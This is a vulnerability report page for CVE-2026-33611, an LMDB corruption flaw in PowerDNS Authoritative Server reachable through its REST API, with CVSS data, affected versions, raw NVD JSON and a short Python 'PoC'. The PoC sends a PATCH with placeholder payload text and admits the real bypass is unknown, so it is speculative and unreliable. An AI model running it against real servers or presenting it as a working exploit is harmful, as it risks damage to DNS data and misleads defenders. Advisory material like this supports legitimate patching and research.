Security Vulnerability Report
CVE-2026-33611 CVSS 6.5 MEDIUM

Published: 2026-04-22 14:16:55
Last Modified: 2026-05-12 20:16:47

Description

An operator allowed to use the REST API can cause the Authoritative server to produce invalid HTTPS or SVCB record data, which can in turn cause LMDB database corruption, if using the LMDB backend.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

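cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:* (versions from 4.9.0 up to, but not including, 4.9.14) - VULNERABLE
cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:* (versions from 5.0.0 up to, but not including, 5.0.4) - VULNERABLE
PowerDNS Authoritative Server (specific versions using the LMDB backend)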

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# PowerDNS API endpoint
url = "http://target-pdns:8081/api/v1/servers/localhost/zones/example.com"

# Headers with API Key (High privileges required)
headers = {
    "X-API-Key": "<REDACTED_API_KEY>",
    "Content-Type": "application/json"
}

# Malicious payload attempting to corrupt LMDB via invalid HTTPS record
# Note: The exact payload depends on the specific validation bypass
payload = {
    "rrsets": [{
        "name": "example.com",
        "type": "HTTPS",
        "ttl": 3600,
        "records": [{
            "content": "1 . alpn=\"h3\" malformed_payload=\"<inject_corrupt_data>\"",
            "disabled": False
        }]
    }]
}

try:
    response = requests.patch(url, headers=headers, data=json.dumps(payload))
    if response.status_code == 204:
        print("[+] Potential payload sent successfully.")
    else:
        print(f"[-] Request failed: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

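References

https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-05.html (tagged "Broken Link" in the record)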

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33611", "sourceIdentifier": "[email protected]", "published": "2026-04-22T14:16:55.000", "lastModified": "2026-05-12T20:16:46.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An operator allowed to use the REST API can cause the Authoritative server to produce invalid HTTPS or SVCB record data, which can in turn cause LMDB database corruption, if using the LMDB backend."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.0", "versionEndExcluding": "4.9.14", "matchCriteriaId": "08464BC2-733F-4260-878D-DE05919A7A7D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.4", 
"matchCriteriaId": "A26C526E-15DC-41BE-9B66-FC6A63679562"}]}]}], "references": [{"url": "https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-05.html", "source": "[email protected]", "tags": ["Broken Link"]}]}}